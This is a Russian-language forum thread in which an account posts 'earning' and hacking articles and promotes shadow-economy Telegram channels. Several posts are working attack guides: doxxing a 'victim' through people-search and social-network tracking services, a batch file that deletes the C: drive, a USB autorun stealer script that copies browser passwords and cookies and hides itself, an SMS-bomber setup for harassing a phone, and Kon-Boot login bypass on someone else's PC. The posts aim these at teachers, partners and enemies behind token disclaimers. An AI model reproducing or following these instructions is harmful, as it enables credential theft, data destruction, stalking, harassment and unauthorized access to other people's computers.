От автора NEW Авторские статьи / схемы заработка от BlackMast

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150


Приветствуем всех читателей и участников форума!
В этой теме мы будем публиковать наши авторские статьи.
Наша команда писателей тщательно выбирает интересные темы и пишет оригинальный контент специально для вас!

Каждую неделю мы будем делиться с вами новым контентом, связанный с дарком!

💢 Еще больше контента можно найти на нашем канале в Телеграме!
https://t.me/+_nx0mbcIGWlhMTFi

➖ Авторские статьи по заработку, мануалы и скрипты по безопасности

➖ Абсолютно каждый день свежие новости про крипту, теневые темы, криминал и NFT

☑ Так же у нас есть чат, где можно найти работу в теневой сфере или подыскать покупателей на свои услуги!​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150
Назови мне свое имя, и я скажу, кто ты: как "пробить" человека?

Вступить в нашу ПРИВАТКУ

Так или иначе, любой человек оставляет своей след в всемирной паутине. Каждый второй сайт собирает, хранит, обрабатывает, а иногда и продает ваши данные третьим лицам. Утечки данных и пренебрежение безопасностью многих людей дают возможность для быстрого сбора информации. Не нужно быть хакером, совершать какие-либо противоправные действия или иметь доступ к закрытым базам правоохранительных органов, чтобы пробить конкретного человека, вся информация лежит на поверхности. Все, что нам нужно - это знать несколько терминов и открытые источники по поиску данных. Обо всем этом и пойдет речь в статье.
Википедия гласит: «90 процентов разведданных приходит из открытых источников и только 10 — за счёт работы агентуры»
OSINT (Open-source intelligence) - разведка в открытых источниках, включает в себя поиск, анализ и сбор разведывательной информации, полученной из общедоступных источников. OSINT не является взломом, шпионажем, вербовкой или иным противозаконным действием.
Этапы:



  1. Постановка/формулировка задачи;
  2. Планирование;
  3. Сбор данных;
  4. Обработка информации;
  5. Анализ результатов и отчет.
Постановка задачи:

На начальном этапе важно установить для себя цель, к примеру: "Нужно узнать как можно больше информации об этом человеке". Под информацией мы подразумеваем его биографию, психологический портрет, место жительства, работы и другую важную для нас информацию.
Планирование:

Не имея четкого плана, вы будете долго блуждать на просторах интернета, тщетно пытаясь хоть что-то найти. В лучшем случае вы сможете найти какие-то обрывки данных, в худшем потратите свое время.
Итак, как выстроить план:

  • Известная информация
Подумайте, что на данный момент у вас уже имеется: имя, почта, фотография, круг друзей, телефон и т.д. Это может быть любая информация, за которую хоть как-то можно зацепиться. Даже, казалось бы, обычный ник, используемый в интернете, уже может ускорить поиск.

  • Гипотезы
Когда вы собрали всю известную информацию, вам нужно выстроить несколько предположений. Например:
У вас есть фото, значит вы можете приблизительно установить возраст человека. На фотографии он находится рядом с машиной, следовательно формулируем гипотезу, что машина принадлежит ему и предполагаем ее марку. На нем надет деловой костюм, скорее всего он работает в офисе и т.п.
Будьте готовы к тому, что многие ваши гипотезы могут не подтвердиться, в таком случае сразу же откидывайте несоответствующие и заменяйте новыми предположениями.
Имея несколько гипотез, вы можете переходить к следующему этапу - поиску информации.
Сбор данных

Пожалуй, самый важный и сложный этап всей работы. Для того, чтобы собрать данные нужно знать, где их искать. И начнем мы с самого простого и очевидного на первый взгляд метода поиска данных:
Поисковики
Вы можете найти колоссальное количество информации в обычном Google, если будете правильно составлять запрос. А помогут вам в этом поисковые операторы, о которых мы говорили в прошлой статье.
Предлагаю вашему вниманию подборку поисковиков для облегчения поиска:

  • http://www.searchenginesindex.com/ru/ - подборка поисковиков по всем странам.
  • https://toolbox.google.com/datasetsearch - бета-версия поисковика Google по базам данных.
  • https://hackernoon.com/untraceable-s...s-alternatives - англоязычный поисковик, довольно популярный.
  • https://findo.com/ - умная система поиска по всем личным документам, облачным хранилищам, соцсетям, а так же файлам на устройствах.
  • https://www.deepgram.com/ - поисковик по аудиофайлам.
  • http://www.data.gov/ - специализированный поисковик по всем сайтам и открытым базам данных американского правительства.
  • Omgili - Find out what people are saying - поисковик по форумам, добирается в самые дебри мирового интернета.
  • http://www.revimg.com/ - поисковик по фотографиям, позволяющий определить, где ранее были размещены изображения.
  • https://lumendatabase.org/ - база данных для сбора и анализа юридических запросов на удаление контента. С помощью Lumen можно посмотреть, кем был создан запрос и увидеть удаленный материал.
Поиск информации по номеру телефона

  • Nomer.org - крупная база номеров России и некоторых стран СНГ. Позволяет узнать имя человека или же по имени найти номер телефона и адрес проживания. Для обхождения блокировки нужно использовать VPN.
  • https://ftpn.ru/search-phone/ выдает по номеру телефона дорки в Google и Яндекс.
Поиск информации по Email
Сервисы, позволяющие проверить существование адреса электронной почты:

Более подробная информация:

Поиск по ФИО

  • Occrp - находит людей, используя миллионы документов, файлов, утечек.
  • Infobel - ищет человека в любой точке мире, показывая номер телефона, адрес.
  • Zytely - покажет адрес человека по ФИО, либо наоборот, но для этого нужно знать город.
  • Yasni - поиск людей по фамилии, имени или никнейму, выдает фото, адрес, номер телефона, профили в социальных сетях.
  • Clustrmaps (https://clustrmaps.com/p/) — находит адрес проживания, номер телефона, возраст, место работы, специальность и многое другое.


Обработка информации

Когда данные собраны, переходим к следующему этапу - обработка. Определяем какая информация у нас есть, и что она дает. Также оцениваем логичность данных, они не должны противоречить друг другу.
Отчет

Так как мы занимаемся разведкой в личных целях и в рамках закона, нам не нужно составлять сложные графики. Однако, полученные данные все равно лучше зафиксировать, так как сложно удержать все в голове. Самый простой вариант: таблица. Она поможет сгруппировать небольшое количество информации в единое целое. Но если накопилось много данных - таблица не поможет, тогда на помощь приходят mindmaps (схемы связей и детализации между объектами). С помощью mindmaps можно увидеть закономерность или общую связь, которая раньше не приходила на ум.
Вывод:

Таким образом, мы узнали, что такое OSINT, рассмотрели его этапы и выяснили, как собирать данные о конкретном человеке в открытых источниках. Существуют огромные возможности, воспользовавшись которыми вы можете попробовать себя в роли интернет-разведчика. Это лишь часть полезных сайтов для поиска интересующей информации. В следующей статье мы более подробно разберем полезные ресурсы по поиску в социальных сетях и пробиву по фотографиям.
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150
Назови мне свое имя, и я скажу, кто ты: деанон по социальным сетям


"Осторожнее с тем, что вы постите на Facebook. Что бы это ни было, это еще всплывет когда-нибудь в вашей жизни." - Барак Обама.
Ни для кого не новость, что социальные сети могут сказать о человеке то, что он и сам не понимает до конца. Ваши интересы, хобби, социальный круг, место жительства - все это и многое другое может стать известным всем желающим. Более того, вся нужная информация находится в открытых источниках. Да, любой человек, не имевший ранее дела с интернет-разведкой, после прочтения данной статьи с легкостью сможет найти много интересного о жертве. Но прежде чем мы начнем, советую вам ознакомиться с базовыми знаниями по OSINT.
Социальные сети

Поиск в таких социальных сетях как Facebook, VK, Instagram, Twitter - главные отправные точки. Их возможности беграничны: поиск по городу, имени, возрасту, учебе и другим данным не составляет труда. Но есть и некоторые неочевидные вещи. Существует ряд ресурсов, о возможностях которых вы не догадываетесь. Они не только облегчают поиск, но и помогают обнаружить информацию, которая скрыта на странице пользователя.


С чего начать поиск?

Личные данные


ФИО, фотография, ник, дата рождения, телефон, семейное положение, адрес, образование и т.д. Если вам известно хотя бы одно из этого, то вы уже в состоянии начать поиск.
Представим следующую ситуацию: вам известен только никнейм человека или его email, но вы понятия не имеете в каких социальных сетях начать поиск.
Тогда предлагаю воспользоваться следующими сервисами:
  • https://knowem.com/ - на данном сайте представлено свыше 500 соц. сетей, вам лишь нужно вести нужный ник, и сервис покажет в каких соц. сетях зарегистрирован пользователь.
  • https://pipl.com/ - полезный ресурс для поиска человека по почте или никнейму. Аналогично предыдущему ищет профили в самых популярных соц. сетях. Несмотря на то что сайт платный, вам предоставляется пробный период 14 дней.

Социальный поиск

Поисковики Google, Yandex индексируют данные из социальных сетей, но зачастую это лишь имя, фамилия и небольшое описание. Операторы поиска помогут найти намного больше, чем обычный запрос в поисковике.
Так, если знать прежний id пользователя или сообщества, которые больше не существуют, можно из кэша поисковика обнаружить удаленный контент, который был на странице на момент индексации. Это также работает и с недавно удаленными постами.
Для поиска профиля человека введите: "vk id7654321";
Для сообщества: "vk club7654321";
Поиск поста: "vk wall7654321", "vk wall-7654321?offset=20" (и менять значение offset, то есть смещения: 40,60,80). Используйте дефис по той причине, что некоторые id сообществ могут совпадать с id пользователей;
Для альбомов: "vk.com/album-7654321_0".


Круг общения

Круг общения человека оставляет очень сильный отпечаток в сети. Его можно отследить и воспроизвести. Но поиск информации - занятие рутинное и несет мало пользы, если не иметь представления, что и где искать. Довольно часто вы можете столкнуться с такими проблемами как: закрытый профиль, скудное количество данных и т.д. Таким образом, вы доходите до того, что часами прочесываете все социальное окружение человека, пытаясь найти хоть какую-то зацепку.
Если человек предпочел скрыть свой аккаунт Вконтакте, то это не проблема, так как его друзья могут предоставить гораздо больше данных о нем. Попробуйте воспользоваться следующими сайтами:
  • http://220vk.com/ - всеобъемлющий сервис, включает такие неявные возможности как: скрытые друзья, исходящие лайки, комментарии, цепочки друзей, черный список, города друзей и другой мониторинг страниц. Также способен установить наблюдение за аккаунтом и отслеживать его.
  • https://vkdia.com/ - узнайте с кем человек ведет переписку, предположительно показывает собеседников с помощью временных интервалов, определяет время проведенное в сети. Не требует авторизации и абсолютно бесплатный.
Facebook же имеет такой сервис как Graph Search, но он все равно мало чего может дать.
  • Возьмите на вооружение сайт graph.tips, который покажет куда больше информации: посещенные места, комментарии на фотографиях и многое другое.
  • http://likealyzer.com/ - мониторинг активности страницы.
  • https://searchisback.com/ - ищет профиль человека по городу, семейному положению, интересам и др.
  • https://findmyfbid.in/ - определяет ID профиля, который изначально скрыт. Благодаря ID вы можете находить любую информацию.
  • http://zesty.ca/facebook/ - поиск информации по ID.
  • whopostedwhat.com - ищет посты в Facebook.
  • @getfb_bot - бот в телеграме, найдет страницу по номеру телефона.
  • phantombuster.com - с помощью данного сервиса вы можете сделать парсинг страницы.

Интересы и сообщества

Помимо круга общения, помощниками могут стать интересы. Присмотритесь в каких сообществах состоит человек, он наверняка будет иметь парочку любимых, которые скажут о его хобби. Если сообщества отсутствуют, то начинаем мониторинг лайков. Вконтакте имеет кучу сайтов для слежения за активностью:

С другими социальными сетями дела обстоят немного иначе. Для поиска лайков и комментариев, например, в Instagram можно воспользоваться поисковым оператором «site:instagram.com».


Вывод

В этой статье мы максимально постарались собрать всю главную информацию и самые полезные ссылки на рабочие сервисы по OSINT в социальных сетях. Надеемся, что данная информация была вам полезной, и вы узнали хоть что-то новое про распространенные инструменты и методы их использования. В следующей статье вы узнаете, как найти человека только по фотографии, а также как устроен поиск по изображению.

 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150
четверг.jpg

Безопасность на самом высшем уровне!

Рассказываем в нашей авторской статье про создание собственного VPN-сервера.
Плюсы и минусы, инструкция по созданию и подключению.

Начать читать
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150
photo_2022-05-23_23-44-28.jpg

Вступить в наш чат
Что такое Google Dork?
Google Dork, также известный как Google Dorking или Google Hacking, стал ценным ресурсом для исследователей безопасности. А вот для обычного человека Google - это всего лишь поисковый сервис для картинок, видео, новостей. Но на сегодняшний день Google является одним из самых полезных инструментов для взлома и кражи информации, который используют хакеры.

Google Dork - это метод взлома компьютера, использующий приложения Google, такие как Google Search. Делается это очень просто через дыры в поисковом запросе. Иначе говоря, Google Dork - это использование возможностей собственной поисковой системы Google для поиска уязвимых приложений и серверов.
1111111037da82f0c46a1fdb79df.jpg
Как работает Dork?
Например, вы решили купить камеру наблюдения для того чтобы смотреть с телефона, что происходит дома, пока вы на работе. Все, что вам нужно сделать - это загрузить приложение на телефон или планшет, и вы можете получить изображение с камеры видеонаблюдения в реальном времени. Однако, человек, который обладает знаниями, может перехватить запись с камеры с помощью одного лишь гугла. Как это возможно? К сожалению или к счастью, Google не может защитить устройства в интернете, в особенности те, которые работают на серверах HTTP или HTTPS. В результате, в поисковик попадают все те вещи, которые там быть не должны - данные от учетных записей пользователей, списки адресов email, открытые веб-камеры и многое другое.

Если владелец веб-сайта не использует файл robots.txt для блокировки определенных ресурсов, то Google проиндексирует всю информацию, которая находится на нем. Логично предположить, что через какое-то время любой человек в мире получит доступ к этой информации, если будет знать, что искать и как искать.



Предотвращение Google Dork
Но существует множество способов, как избежать попадания в руки Google Dork. Это делается для того, чтобы избежать индексации вашей конфиденциальной информации поисковым системам.
  1. Шифрование. Не забудьте про шифровку вашей личной информации (пользователя, пароли, данные кредитных карт, почту и т.д.). Вы можете предотвратить попадание ваших файлов в Google Dork, зашифровав их.​
  2. Проверка Dorks. Постоянно проверяйте уязвимости на сайте, они часто используются для поиска наиболее популярных запросов Google Dorks. Отправляйте регулярные запросы на свой сайт, чтобы узнать, сможете ли вы отыскать какую-либо важную информацию до того, как это сделают хакеры. В базе данных Exploit Db Dorks вы найдете большой список популярных dorks.​
  3. Удаление. После того, как вы обнаружили уязвимый контент, вам необходимо отправить запрос на удаление с помощью Google Search Consolet.​
  4. Robots.txt. При помощи файла robots.txt блокируйте доступ к конфиденциальному контенту.​


Применение конфигурации robots.txt для устранения Google Dorks
Самый лучший способ обезопасить себя от Google dorks – это использовать файл robots.txt. Рассмотрим несколько примеров.

C помощью следующей конфигурации любое сканирование на вашем сайте будет запрещено, что крайне важно при использовании сайта частного доступа.
Кроме того, вы можете заблокировать определенные каталоги, в которых будет исключена возможность сканирования. Чтобы защитить область / admin от злоумышленников введите этот код внутри:
Также это обезопасит все внутренние подкаталоги.

Для ограничения доступа к определенным файлам введите:
Disallow: /privatearea/file.htm​
Ограничить доступ к динамическим URL, которые содержат символ "?"
Чтобы ограничить доступ к определенным расширениям файлов, используйте:
При таком раскладе доступ ко всем файлам .php будет запрещен.



Вывод
Google - один из самых популярных поисковиков в мире, который, как все знают, может найти практически все. Однако, мы выясняли, что Google может быть использован как хакерский инструмент, если вы не будете на шаг впереди злоумышленников. Крайне важно уметь использовать его для поиска уязвимостей на вашем сайте, чтобы это потом не обернулось против вас. Зная и применяя вышеописанные способы, Google Dork может стать полезным и практичным помощником для вас.​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150
Cооснователь Ethereum Виталик Бутерин недавно рассказал о своём новом проекте – Soulbound Tokens (SBT) или токены, связанные душами.​
Cегодня мы разберёмся в этом явлении. Вы узнаете в чем суть этих токенов, для чего они нужны и когда появятся.




Что такое SBT

Аббревиатура SBT расшифровывается как Soulbound Tokens, что в переводе означает «Связанные душой токены». Пошло такое название из игры World of Warcraft, словом «Soulbound» назывался отдельный класс предметов, которые можно было получить за внутриигровые достижения, например, за победу над противником.
В отличие от игры, в реальной жизни Soulbound действуют как показатели ваших достижений, только вместо профиля игрока, они будут привязываться к крипто-кошельку пользователя. SBT точно так же, как ваше резюме, представляют ваши навыки, опыт работы, образование и квалификацию. На основе всего этого, можно получить представление о ваших способностях.


Отличие NFT от SBT

Основное отличие от NFT заключается в том, SBT не подлежат передаче и, следовательно, не могут быть приобретены посредством торговли. Каждый SBT навсегда привязывается к кошельку.


Сферы применения
  • Искусство. SBT значительно облегчат жизнь NFT-художникам, так как никто не сможет присвоить себе авторские права на чужую работу. Также для того, чтобы разрекламировать свой NFT, художнику приходится заводить аккаунт в Twitter, Instagram и на многих других площадках. Однако, если у художника будет свой Soulbound Token, то соцсети и биржи станут попросту не нужны.​
  • Маркетинг. Кроме искусства можно представить использование SBT в любых сферах, где требуется проверка подлинности, например, рынок аренды или покупки недвижимости, где многое значит репутация продавца и достоверность данных, которые он предоставляет о своем объекте.​
  • Образование. Когда NFT только начали набирать популярность, шли разговоры о том, что учебные заведения через N-количество лет будут выдавать дипломы в виде NFT, но здесь возникла несостыковка: если NFT можно продать другому человеку, то, соответственно, то же самое можно проделать и с дипломом. Но тут в дело вступают Soulbound Tokens – с ними купить образование или другого рода достижения не получится. Прямая проверка подлинности даст возможность избежать ряд проблем, так как использование технологий блокчейна поможет определить авторство, время, дату получения и другую информацию.​



Как могут присваиваться SBT
  • Самостоятельно. Вы можете заполнить и подтвердить информацию о себе, содержащую данные об образовании, стаже работы, творчестве.​
  • Пользователями. Такие SBT могут быть получены и подтверждены участниками, с которыми вы взаимодействовали — например, за помощь другому пользователю.​
  • Организаторами событий. Это будет своего рода сертификат, подтверждающий участие. Например, за участие в конференции, за прохождение обучения и т.д.​
Таким образом, у крипто-кошелька пользователя начнет формироваться своя история и репутация. Можно будет наблюдать, где он обучался, в каких мероприятиях участвовал, кому помогал и где работал.


Когда появятся SBT?

По оценке Виталика Бутерина, первые SBT появятся к концу 2022 года. А к 2024 году они уже станут трендом. Выпускать их смогут как обычные пользователи, так и организации, включая DAO.


Заключение

Soulbound tokens презентовали себя как передовую технологию, позволяющую развить цифровое портфолио, сформировать и укрепить репутацию и сделать пользовательские отношения более прозрачными и надёжными. Хотя нам еще предстоит узнать, как именно SBT повлияют на цифровое пространство, но мы уже точно можем сделать вывод о том, что они изменят мир криптовалюты.​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150



Вступить в наш чат
Задумывались ли вы когда-нибудь как создаются вирусы на ПК? Вы будете удивлены, узнав, что для этого вам не нужны никакие знания о языках программирования. Все, что вам потребуется - это блокнот и пара, написанных строк, о которых мы расскажем в этой статье. Это очень просто. Давайте начнем!



Что такое .bat

Для начала разберём немного теории, которая нам впоследствии понадобится. Не все знают, что в блокноте можно написать простые вирусы в формате .bat. Что это за файл такой?
.bat — текстовый файл в MS-DOS, OS/2 или Windows, содержащий последовательность команд после запуска которых, программа-интерпретатор начинает их исполнять.
Как создать файл .bat:
  • Открыть блокнот или иной текстовый редактор;
  • Ввести нужные команды;
  • Сохранить файл с расширением .bat (Например: virus.bat)
Итак, приступим к созданию вируса с помощью блокнота.
Опасный вирус

Дисклеймер

Вся информация, приведённая ниже, представлена лишь в ознакомительных целях. Не пытайтесь повторить это, так как это может полностью уничтожить компьютер за считанные секунды.
  • Для начала вам нужно открыть блокнот.
  • Далее скопируйте и вставьте приведенный ниже код на экран блокнота.
@Echo offDel C: *.* |y
  • Сохраните этот файл под любым именем, но обязательно в формате .bat.
  • При запуске этого файла, операционная система и диск С будут уничтожены без возможности восстановления.
Этот метод предназначен только для ознакомительных целей. Не пытайтесь сделать это на своем компьютере, так как это полностью отформатирует ваш диск C.
Вирусы-розыгрыши

1. Создаем экран как в «Матрице»


Данный вирус абсолютно безопасен, потому что на самом деле это больше трюк с блокнотом, не имеющий отношения к реестру компьютера. Используя этот способ, вы можете запустить матричный экран со случайной последовательностью цифр.
  • Откройте блокнот и введите в него следующий код:
@echo offcolor 02:startecho %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%goto start
  • Теперь сохраните файл как под названием Matrix.bat;
  • Откройте файл и почувствуйте себя “избранным”.
Данный трюк может быть использован в качестве розыгрыша друзей.
2. Отключаем доступ к Интернету

Это еще один неопасный способ, который вы также можете продемонстрировать друзьям.
  • Откройте блокнот;
  • Скопируйте и вставьте, ниже указанный код:
@Echo off Ipconfig / release
  • Сохраните файл под любым именем, но обязательно в формате .bat;
  • Как только файл будет открыт, IP-адрес потеряется;
  • Чтобы вернуть все, как было, введите в cmd команду «Обновить» или «IPconfig», и проблема будет решена.
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150


Вступить в наш чат
В этой статье мы расскажем о том, как легко можно украсть учётные записи и пароли браузера с помощью флешки. А так же поговорим, как защитить себя от подобных атак.



Cookie-файлы
– зашифрованные текстовые документы, содержащие информацию о пользователе: статистику, персональные настройки, сохранённые логины и пароли, а также многое другое.
Что это может дать?
Вариантов применения очень много, все лишь зависит от вашей изобретательности. Если вы студент или школьник, то с помощью этого способа вы можете украсть данные препода, тем самым первым узнать о предстоящих контрольных и проверочных работах. Вы также можете проверить вторую половинку или наказать недоброжелателя.
Итак, переходим к пошаговой инструкции:
Создаём cookie-стиллер

1.
В первую очередь вам, конечно же, потребуется любая флэшка, где мы создадим следующие текстовые файлы:
и
Не забудьте изменить расширения этих файлов с txt на inf и bat.


2. В файле autorun.infвводим:
А в файле stealer.batпишем:
CD/D %APPDATA%\Opera\Opera\
copy /y wand.dat %~d0\Opera\
copy /y cookies.dat %~d0\Opera\
cd %AppData%\Mozilla\Firefox\Profiles\*.default
copy /y cookies.sqlite %~d0\Mozilla
copy /y key3.db %~d0\Mozilla
copy /y signons.sqlite %~d0\Mozilla
copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla
cd %localappdata%\Google\Chrome\User Data\Default
copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"
cd %localappdata%\Yandex\YandexBrowser\User Data\Default
copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex"
cd %localappdata%\Amigo\User Data\Default
copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo"
attrib +h %~d0\autorun.inf
Стиллер готов. Сохраняем и закрываем.

Но что же делать после того, как вы украли куки? Все просто.
3.Нажимаем Windows+R и вводим:
4. Свои куки на СВОЁМ компьютере удаляем, либо временно скидываем на флешку. А на их место копируем полученные.

5. Теперь скачиваем программу WebBrowserPassView. Здесь уже ничего не надо нажимать - программа сама загрузит и расшифрует куки из ваших браузеров. Просто открываем ее и видим сайты с учётными записями и паролями к ним.

Как защитить себя от cookie-стиллера

Никогда не храните пароли в браузере! Уж лучше в тетрадке под кроватью. Хранить пароли в браузере очень опасно. Но что же делать?
Если вы не можете положиться на свою память, то у вас есть два варианта для хранения:
  • Бумага. Самый традиционный и безопасный способ, если при этом хранить в недоступном месте.
  • Софт для хранения паролей. Если вы до сих пор записываете пароли в текстовом документе/блокноте на ПК, то знайте, что это ни чем не лучше браузера. Вместо этого используйте специальное программное обеспечение для хранения паролей. Например, софт KeePassX, который распространяется бесплатно на базе лицензии GPL и имеет открытый исходный код.
Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150


Вступить в наш чат
В сегодняшней статье мы расскажем как перегрузить телефон жертвы спамом. Данный способ является очень действенным и даже может вывести телефон из строя на время.
Дисклеймер: Вся информация, опубликованная в этой статье, предоставлена лишь в ознакомительных целях. Мы ни к чему не призываем и не несём ответственности за ваши действия.




СМС-бомбер - это ПО для массовой рассылки сообщений на заданный номер телефона. СМС-атака зачастую используется как способ отвлечения внимания жертвы при осуществлении взлома социальных сетей, кражи денег с кредитки или просто как метод психологического давления.


1-й способ - на компьютере

В первую очередь вам необходимо скачать и установить две программы:
Как только завершится установка, откройте Git и нажмите правой кнопкой мыши по рабочему столу, выбрав "Git Bash Here".





Следующим действием прописываем команды:
Далее заходим в папку с бомбером:
  • cd b0mb3r
Теперь устанавливаем библиотеку:
  • pip install -r requirements.txt
И запускаем:
  • python main.py
В браузере откроется вкладка с бомбером, где вам нужно будет заполнить поле:





2-й способ - на телефоне
Вы также можете выполнить установку смс бомбера на телефоне.
Для этого скачиваем Termux.
После установки пишем эти команды:
  • pkg update && pkg upgrade (обновляем пакеты)
  • pkg install python (устанавливаем Python)
  • pkg install git (устанавливаем Git)
  • git clone https://github.com/crinny/b0mb3r (клонируем репозиторий)
  • cd b0mb3r (переходим в директорию с бомбером)
  • pip install -r requirements.txt (устанавливаем библиотеку)
  • python main.py (запускаем)
Если браузер не открывается, тогда скопируйте следующую ссылку:





И затем ее вставляем в адресную строку браузера:





Теперь у вас откроется та же самая вкладка, как в 1-ом способе. Заполните поле и атака начнётся.





__________________
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150
Хотите узнать, как войти в компьютер другого человека, не зная при этом пароля? Да так, чтобы жертва еще не догадалась о ваших планах? Звучит интригующе? Тогда сядьте поудобнее и приготовьтесь к прочтению нашего простого мануала. И нет, вам не нужно быть профессиональным хакером или программистом, чтобы провернуть все это. Мы расскажем как просто проникнуть в ПК с помощью одной лишь программы - Kon-Boot.



Kon-Boot — программа, временно изменяющая содержимое ядра Windows. Она позволяет войти в учётную запись без пароля, не сбрасывая его. При повторном включении содержимое ядра восстанавливается, и снова запрашивается пароль, поэтому пользователь ПК ничего не заметит.
Для того, чтобы провернуть все это вам потребуется:
1. USB-накопитель;
2. Программа Kon-Boot. Скачать здесь.
Установка программы Kon-Boot на флешку
  • Вставляем флешку в USB разъём.​
  • После того как вы распаковали программу, откройте папку Kon-Boot for Windows 2.5.0 и запустите файл KonBootInstaller от имени администратора.​


Далее появится окно с предостережением о том, что в ПК должна находится только одна флешка, иначе во время установки может быть выдана ошибка. Если готовы к установке, то подтвердите.

В разделе Available USB drivers из выпадающего списка выберите флешку и нажмите Install to USB stick (with EFI support).

  • Имейте ввиду, что вся информация, за исключением программы Kon-Boot, во время установки будет утеряна. Если на флешке ничего важного не осталось, то жмём «Да».​
  • Теперь запустится установка:​


Если вы столкнётесь с ошибкой:​
Fatal: unable to copy C:\Kon-Boot for Windows 2.5.0\kon-bootUSB\USBFILES\menu.lst to G:\menu.lst, error = 0x00000002 (file exists=0)​
То переименуйте файл konboot.lst в menu.lst, после чего заново запишите Kon-Boot на флешку через KonBootInstaller.exe, тогда ошибка будет устранена.​
  • По завершению установки, нажмите «Оk».​


Запуск флешки на ПК
  • Вставляем USB-накопитель с программой в разъём и запускаем ПК.​
  • Далее вызываем Boot menu. На разных материнских платах клавиши вызова Boot menu отличаются, поэтому сверьтесь с таблицей ниже:​
  • Если же вы не знаете какая материнка стоит на компьютере, то обесточьте его и откройте боковую крышку системного блока, там вы найдёте модель.​
  • выбираем загрузку с флешки и кликаем «Enter».​
  • В новом окне выберите Kon-Boot (CURRENT VERSION) и нажмите «Enter».​
  • Далее на экране появится надпись Kon-Boot, после чего начнётся загрузка Windows.​
Если на экране появилась надпись «No Systemdisk. Booting from harddisk. Start booting from USB device…» — переустановите Kon-Boot используя KonBootInstaller.exe.​
Если же на экране появилась надпись «Dummy bios detected trying to fix smap entries» — Вам необходимо в настройках BIOS выключить опцию Secure boot, а также включить опции Load Legacy Option Rom / CSM.​
  • Когда ПК запросит пароль, оставьте поле пустым, либо введите случайные символы (Windows примет их как за правильный пароль) и нажмите «Enter».​
Готово! Вы успешно обошли пароль. При повторном включении компьютера, все вернётся на свои места.

Вся информация в этой статье написана исключительно в ознакомительных целях.
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150
Ни для кого не секрет, что информация о транзакциях в блокчейне является общедоступной, а адрес криптокошелька легко соотнести с личностью пользователя, поэтому можно сделать вывод о том, что большинство криптовалют не анонимны. Но позитивным моментом является тот факт, что существует ряд криптовалют, ориентированных на приватность. Одной из таких является Ghost. В этой статье мы расскажем чем же отличается эта криптовалюта от любой другой и правда ли она полностью конфиденциальна.


На момент появления Биткоина в 2009 году считалось невозможным определить личность владельца криптобиржи. Однако, сейчас мы знаем о том, что любой человек может отслеживать путь перемещения биткоинов в блокчейне и сопоставлять адреса кошельков с конкретными личностями.
Но с тех пор прошло много времени и компании пересмотрели концепцию анонимной криптовалюты. Для наглядности давайте посмотрим на очевидные отличия GHOST от других не менее популярных криптовалют :





  • Итак, протокол Dandelion, он же одуванчик, делит транзакции на две части:​
«Стебель». Данные переходят от 1-го узла ко 2-му рандомное количество раз. Иначе говоря, передаются от одного человека к другому.
«Пух». Последний, у кого они оказались, рассылает их по всей сети. Так, как это бы происходило в обычном блокчейне.
Появляется элемент непредсказуемости, поэтому невозможно отследить изначальный источник отправления. Как видно из таблицы, похожий протокол применяется лишь в Monero.
  • Cold-Staking. Стейкинг — это блокировка своей криптовалюты для получения дальнейшей прибыли. Обычно для стейкинга нужно находится в онлайне и раскрывать адрес своего кошелька. Но в Ghost этот момент решается с помощью холодного стейкинга без подключения к интернету. Это помогает сделать процесс стейкинга более конфиденциальным.​
  • Ghost Pay. Как и у всех анонимных криптовалют, Ещё одним отличием Ghost от других криптокошельков является возможность получать и отправлять криптовалюту прямо внутри Telegram бота @GhostPayBot.​
Где покупать Ghost

Практически на всех криптобиржах есть обязательная верификация личности. Чтобы сохранить анонимность, необходимо покупать криптовалюту с осторожностью. Вот список конфиденциальных способов купить GHOST:
  1. TradeOgre. Эта криптобиржа ориентируется на конфиденциальность и не разглашает информацию о своих клиентах третьим лицам. Если вы хотите зарегистрироваться на ней, вам понадобится электронная почта и аутентификатор — приложение, генерирующее код входа. GHOST торгуется в паре с BTС, а комиссия составляет 0,01 GHOSТ.​
  2. HotBit. Эта биржа является одной из крупнейших в мире по объёму торгов. Чтобы зарегистрировать, необходимо подтвердить телефон. GHOST торгуется с тремя другими криптовалютами: USDT, BTC и ETH. Комиссия за вывод составляет 11 GHOST.​
  3. GhostX. Это своего рода обменник без посредников. Чтобы начать им пользоваться нужно только подключить свой криптокошелек. Обменять GHOST можно на 26 доступных криптовалют. Комиссия зависит от уровня загрузки сети.​
Хотя существуют и другие сервисы для покупки и обмена криптовалюты GHOST, но они собирают больше данных о вас, а значит менее конфиденциальны.
Вывод

Ghost — это анонимная криптовалюта, в основе которой лежат Patrticl, который в свою очередь произошел от Биткоина. В отличие от аналогов, в ней используются технологии Proof-of-Stake, RingCT и Dandelion++, а так же Ghost Pay, который работает с Telegram.​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150
